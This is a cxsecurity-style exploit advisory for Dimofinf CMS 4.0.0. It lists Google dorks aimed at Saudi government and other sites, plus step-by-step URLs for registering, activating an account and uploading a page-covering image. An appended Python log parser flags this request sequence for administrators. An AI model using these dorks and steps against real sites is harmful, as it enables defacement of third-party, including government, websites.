Powered By Dimofinf CMS Version 4.0.0 Saudi-Arabia Government Unauthorized Arbitrary Insert File Vulnerability

2018.11.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#################################################################################################

# Exploit Title : Powered By Dimofinf CMS Version 4.0.0 Saudi-Arabia Government Unauthorized Arbitrary Insert File Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : dimofinf.net
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0.0
# Google Dorks :
intext:''Powered by Dimofinf cms Version 4.0.0'' site:gov.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:edu.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:com
intext:''Powered by Dimofinf cms Version 4.0.0'' site:org
intext:''Powered by Dimofinf cms Version 4.0.0'' site:net
intext:''Powered by Dimofinf cms Version 4.0.0'' site:org.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:com.sa
intext: Powered by Dimofinf cms Version 4.0.0 Copyright© Dimensions Of Information Ltd.'' site:sa
inurl:''/include/plugins/news/news.php?action=save&m=news&id='' site:sa
inurl:''/content.php?action=save&m=content&id='' site:sa
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Exploit Usage :

1) Register yourself as Author [ username - password - e-mail address ] [ confirmation is important ]
2) /register.php?action=register
3) Approve your e-mail address. - And then you will be in the author area.
4) TARGET/profile.php?action=[YOUR-PROFILE-NUMBER]
   target/profile/[YOUR-PROFILE-NUMBER]
   + TARGET/register.php?action=activate&userid=[YOUR-PROFILE-NUMBER]&activid=[ACTIVATION-CODE-HERE]
5) After successful registration and confirmation - Find this word under your profile: رفع صورة خلفية الغلاف ("Upload cover background image"). Click and insert your image file.
6) Your image file will cover the whole page.
7) Directory Path : TARGET/contents/covers/[YOUR-PROFILE-NUMBER].jpg .gif .png

Note : Only these file extensions are allowed : bmp - gif - jpe - jpeg - jpg - png - tif - tiff

# Another File Insertion Exploit Usage :

Exploit :
/short_url/l
/short_url-action-l.htm
TARGET/[RANDOM-NUMBER]
TARGET/short_url-action-s-id-[RANDOM-NUMBER].htm

#################################################################################################

# Example Vulnerable Sites =>

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
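For administrators reviewing the access logs of a Dimofinf 4.0.0 site, the following added example (not part of the original advisory and not vendor code) flags the request sequence the usage steps describe: a client requests the register action, activates a profile number, and a cover image for that profile number is later served from contents/covers/. The Combined Log Format, the function name and the sample log lines are assumptions constructed for illustration; the upload request itself is not matched because the advisory does not name its endpoint.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Cover path and extension allowlist as stated in the advisory.
COVER = re.compile(
    r'/contents/covers/(\d+)\.(?:bmp|gif|jpe|jpeg|jpg|png|tif|tiff)$', re.I)

def find_cover_upload_chains(lines):
    """Return sorted (client_ip, profile_id) pairs where a client registered,
    activated a profile, and that profile's cover image was later served."""
    registered = set()   # client IPs that requested the register action
    activated = {}       # profile id -> client IP that activated it
    hits = set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue     # not in the assumed log format
        ip, _method, target, status = m.groups()
        if status[0] in "45":
            continue     # ignore failed requests
        url = urlsplit(target)
        query = parse_qs(url.query)
        action = query.get("action", [""])[0]
        if url.path.endswith("/register.php"):
            uid = query.get("userid", [""])[0]
            if action == "register":
                registered.add(ip)
            elif action == "activate" and ip in registered and uid.isdigit():
                activated[uid] = ip
            continue
        cover = COVER.search(url.path)
        if cover and cover.group(1) in activated:
            hits.add((activated[cover.group(1)], cover.group(1)))
    return sorted(hits)

# Constructed sample log lines (documentation IP ranges, placeholder values).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Nov/2018:10:00:01 +0300] "GET /register.php?action=register HTTP/1.1" 200 5120
203.0.113.7 - - [13/Nov/2018:10:03:40 +0300] "GET /register.php?action=activate&userid=412&activid=PLACEHOLDER HTTP/1.1" 200 2048
198.51.100.20 - - [13/Nov/2018:10:04:00 +0300] "GET /contents/covers/17.jpg HTTP/1.1" 200 80211
203.0.113.7 - - [13/Nov/2018:10:09:12 +0300] "GET /contents/covers/412.png HTTP/1.1" 200 734003
198.51.100.20 - - [13/Nov/2018:10:10:00 +0300] "GET /contents/covers/999.gif HTTP/1.1" 404 0
"""

if __name__ == "__main__":
    for ip, profile in find_cover_upload_chains(SAMPLE_LOG.splitlines()):
        print(f"review: {ip} registered and activated profile {profile}; cover image present")
```

Each flagged pair is a prompt to inspect the file under contents/covers/ for that profile number and to decide whether self-registration should remain open on the site.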



Copyright 2019, cxsecurity.com

 
